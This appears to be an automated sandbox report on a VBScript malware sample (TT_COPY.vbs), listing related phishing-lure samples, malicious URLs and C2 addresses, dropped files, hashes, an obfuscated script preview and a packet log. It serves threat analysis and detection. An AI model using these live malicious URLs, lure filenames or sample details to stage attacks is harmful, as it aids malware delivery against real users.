                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  192.185.145.188PO-09784893 xlsx.vbsGet hashmaliciousBrowse
                  • b3solutionscws.com/wp-admin/includes/yyXYRRIJkuolPn153.fla
                  PO-08784 xlsx.vbeGet hashmaliciousBrowse
                  • b3solutionscws.com/wp-admin/includes/UtXRqIMUipDp192.pfb
                  185.31.121.136SIEM_PO00938467648.vbsGet hashmaliciousBrowse
                    PO-09784893 xlsx.vbsGet hashmaliciousBrowse
                      PO-08784 xlsx.vbeGet hashmaliciousBrowse
                        Ordine n.47201 pdf.vbsGet hashmaliciousBrowse
                          Richiesta urgente.vbsGet hashmaliciousBrowse
                            Payment advis pdf.scr.exeGet hashmaliciousBrowse
                              ordine C220205 pdf.exeGet hashmaliciousBrowse
                                PO#0192 xls.vbsGet hashmaliciousBrowse
                                  ANGEBOTSANFRAGEN.exeGet hashmaliciousBrowse
                                    SecuriteInfo.com.Trojan.NSIS.Agent.21226.9113.exeGet hashmaliciousBrowse

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      ftp.mcmprint.netSIEM_PO00938467648.vbsGet hashmaliciousBrowse
                                      • 185.31.121.136
                                      PO-09784893 xlsx.vbsGet hashmaliciousBrowse
                                      • 185.31.121.136
                                      PO-08784 xlsx.vbeGet hashmaliciousBrowse
                                      • 185.31.121.136
                                      Ordine n.47201 pdf.vbsGet hashmaliciousBrowse
                                      • 185.31.121.136
                                      Richiesta urgente.vbsGet hashmaliciousBrowse
                                      • 185.31.121.136
                                      Payment advis pdf.scr.exeGet hashmaliciousBrowse
                                      • 185.31.121.136
                                      ordine C220205 pdf.exeGet hashmaliciousBrowse
                                      • 185.31.121.136
                                      PO#0192 xls.vbsGet hashmaliciousBrowse
                                      • 185.31.121.136
                                      ANGEBOTSANFRAGEN.exeGet hashmaliciousBrowse
                                      • 185.31.121.136
                                      SecuriteInfo.com.Trojan.NSIS.Agent.21226.9113.exeGet hashmaliciousBrowse
                                      • 185.31.121.136
                                      Jtkmmbl.exeGet hashmaliciousBrowse
                                      • 185.31.121.80
                                      DOC85945003805010 PDF.exeGet hashmaliciousBrowse
                                      • 185.31.121.80
                                      RFQ NO # 577131022.pif.exeGet hashmaliciousBrowse
                                      • 185.31.121.80
                                      PO-57064.scr.exeGet hashmaliciousBrowse
                                      • 185.31.121.80
                                      INQUIRY- EUSQ131302.scr.exeGet hashmaliciousBrowse
                                      • 185.31.121.80

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      UNIFIEDLAYER-AS-1USnuevo_pedido.docx.exeGet hashmaliciousBrowse
                                      • 162.241.61.244
                                      #U266c voice0989876_3-2(3).hTmGet hashmaliciousBrowse
                                      • 192.185.143.215
                                      MHSB7tmAIJ.exeGet hashmaliciousBrowse
                                      • 192.185.79.75
                                      Secure365doc (1).htmlGet hashmaliciousBrowse
                                      • 50.87.176.157
                                      3wjjsE9fZZ.exeGet hashmaliciousBrowse
                                      • 192.185.79.75
                                      http://Bart.elenoxsteel.com/pherhol@bart.govGet hashmaliciousBrowse
                                      • 192.185.129.116
                                      http://Bart.elenoxsteel.com/pherhol@bart.govGet hashmaliciousBrowse
                                      • 192.185.129.116
                                      http://news.newsmax.com/?SKIv.io3vF9tXNnZLWSOh2w2kUPztfIZS&http://Bart.elenoxsteel.com/pherhol@bart.govGet hashmaliciousBrowse
                                      • 192.185.129.116
                                      http://news.newsmax.com/?SKIv.io3vF9tXNnZLWSOh2w2kUPztfIZS&http://Bart.elenoxsteel.com/pherhol@bart.govGet hashmaliciousBrowse
                                      • 192.185.129.116
                                      INVOICE_Ref-IAS-AT2sf_rand(6999).html.htmlGet hashmaliciousBrowse
                                      • 192.185.129.116
                                      Revised Policy Benefits.htmlGet hashmaliciousBrowse
                                      • 192.185.196.49
                                      R#U25b6 #Ud83d#Udd18#U2500#U2500#U2500#U2500#U2500#U2500#U2500 Voice-Msg.919-340-XXXX.htmlGet hashmaliciousBrowse
                                      • 192.185.129.116
                                      https://ib.adnxs.com/getuid?https://remarkable-starlight-37d159.netlify.app#.aHR0cHM6Ly94b2RpdXNkZXNpZ25zLmNvbS9yb3V0ZS9zdGF0ZS8jcmFpbGN1c3RvbWVyc2VydmljZUB4cG8uY29tGet hashmaliciousBrowse
                                      • 162.241.253.90
                                      Paid-Inv-793796002 .htmlGet hashmaliciousBrowse
                                      • 192.185.129.116
                                      0fmEh2zmDj.exeGet hashmaliciousBrowse
                                      • 108.167.164.216
                                      pago_noviembre-diciembre.xlsGet hashmaliciousBrowse
                                      • 192.185.115.3
                                      Cheshire_east_council_section_106_agreement (zx).jsGet hashmaliciousBrowse
                                      • 162.215.212.3
                                      Revised Policy Benefits.htmlGet hashmaliciousBrowse
                                      • 192.185.107.17
                                      7D8vOYikXf.exeGet hashmaliciousBrowse
                                      • 192.254.173.31
                                      yrcYo3FiTV.exeGet hashmaliciousBrowse
                                      • 192.254.173.31

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):0.34726597513537405
                                      Encrypted:false
                                      SSDEEP:3:Nlll:Nll
                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:@...e...........................................................

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3jpr0mil.ht2.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ai3mehq5.lyv.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      \Device\ConDrv

                                      Download File
                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):30
                                      Entropy (8bit):3.964735178725505
                                      Encrypted:false
                                      SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                      MD5:9F754B47B351EF0FC32527B541420595
                                      SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                      SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                      SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                      Malicious:false
                                      Preview:NordVPN directory not found!..

                                      Static File Info

                                      General

                                      File type:ASCII text, with CRLF line terminators
                                      Entropy (8bit):5.882508768775152
                                      TrID:
                                        File name:TT_COPY.vbs
                                        File size:319816
                                        MD5:a27bc40b7cf1e7e7e7a9b38221d4e849
                                        SHA1:d24c19f3cf76f8f47fa6fffb12422f0fa0252b3b
                                        SHA256:28a30c25fb101ed42b050c4b82777929b1cdd9fe02f8f386bb9708d3adb3b9bf
                                        SHA512:b6bbcd0f8e6fa19acc91441f41f9f277a11399b15071ce06acbae4771954bba33e0acf7ee279498bfd701a3beec55c54687a25c579a54be9adcbfa2c133731f8
                                        SSDEEP:6144:T2J71kKaq/0xBIAbO0uzJ44bQ+YwMpXj/3CAS/Sv5Hx5QS:TBKd/0UAbO0q44jkTbvL5QS
                                        TLSH:CF645990AD3B55900E4BA71AFBF149CD4FF30FE3F1012F9B29B45246372A3689A19197
                                        File Content Preview:Smigesparcelwisecisal = ChrW(11202)......on error resume next ..Tilendebringerlateenrigg186 = FileLen("Lassoers89")......Dveskolenliveborns = Ucase(Trim(Mid("Referencerne",27,150)) ) ......BESPARINGERNESUNDERSPR = Space(35)....'LIVSFRELSERNE Concocted BYG

                                        File Icon

                                        Icon Hash:e8d69ece869a9ec4

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Dec 1, 2022 15:50:07.835916996 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:07.952136993 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:07.952317953 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:07.952996969 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.069183111 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.081645966 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.081737995 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.081804037 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.081856012 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.081902027 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.081954956 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.082016945 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.082053900 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.082114935 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.082170010 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.082199097 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.082284927 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.082309008 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.082384109 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.082386017 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.082467079 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.082484007 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.082640886 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.082642078 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.199069977 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.199163914 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.199234009 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.199280024 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.199325085 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.199340105 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.199431896 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.199433088 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.199513912 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.199537039 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.199625015 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.199642897 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.199718952 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.199779034 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.199779034 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.199800968 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.199896097 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.199898958 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.199980021 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.199994087 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.200078964 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.200102091 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.200170040 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.200193882 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.200242043 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.200298071 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.200406075 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.200414896 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.200445890 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.200512886 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.200567007 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.200593948 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.200666904 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.200690985 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.200757027 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.200782061 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.200845003 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.200884104 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.200953960 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.201098919 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.317081928 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.317156076 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.317269087 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.317286015 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.317331076 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.317449093 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.317534924 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.317636013 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.317718029 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.317720890 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.317816019 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.317830086 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.317898989 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.317903996 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.317989111 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.318079948 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.318099022 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.318223000 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.318259954 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.318301916 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.318368912 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.318428040 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.318454027 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.318506956 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.318511963 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.318578959 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.318593025 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.318670034 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.318680048 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.318752050 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.318769932 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.318840027 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.318866014 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.318913937 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.318928957 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.318994999 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.319010019 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.319084883 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.319128990 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.319152117 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.319181919 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.319230080 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.319245100 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.319317102 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.319323063 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.319406033 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.319416046 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.319488049 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.319508076 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.319572926 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.319588900 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.319658041 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.319658995 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.319730997 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.319739103 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.319816113 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.319863081 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.319892883 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.319930077 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.319977999 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.319983006 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.320058107 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.320082903 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.320142984 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.320183039 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.320183039 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.320225000 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.320298910 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.320322037 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.320382118 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.320432901 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.320508003 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.320545912 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.320585012 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.320595980 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.320667982 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.320677996 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.320785999 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.320930958 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.436963081 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.437063932 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.437156916 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.437232018 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.437299013 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.437477112 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.437494993 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.437577963 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.437637091 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.437675953 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.437735081 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.437747955 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.437808037 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.437897921 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.437913895 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.437992096 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.438076019 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.438096046 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.438221931 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.438323021 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.438441992 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.438520908 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.438591957 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.438726902 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.438793898 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.438853979 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.438878059 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.438950062 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.438997984 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.439017057 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.439129114 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.439205885 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.439219952 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.439279079 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.439294100 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.439368963 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.439369917 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.439449072 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.439450979 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.439532042 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.439551115 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.439619064 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.439649105 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.439697027 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.439706087 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.439784050 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.439804077 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.439866066 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.439903021 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.439903021 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.439946890 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440017939 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440023899 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440104961 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440119028 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440188885 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440234900 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440256119 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440339088 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440377951 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440395117 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440459013 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440474987 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440515995 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440527916 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440540075 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440551996 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440566063 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440577030 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440587044 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440598011 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440614939 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440628052 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440639973 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440649033 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440653086 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440668106 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440680027 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440691948 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440702915 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440715075 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440726995 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440737963 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440749884 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440762043 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440773964 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440784931 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440797091 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440809011 CET8049824192.185.145.188192.168.11.20
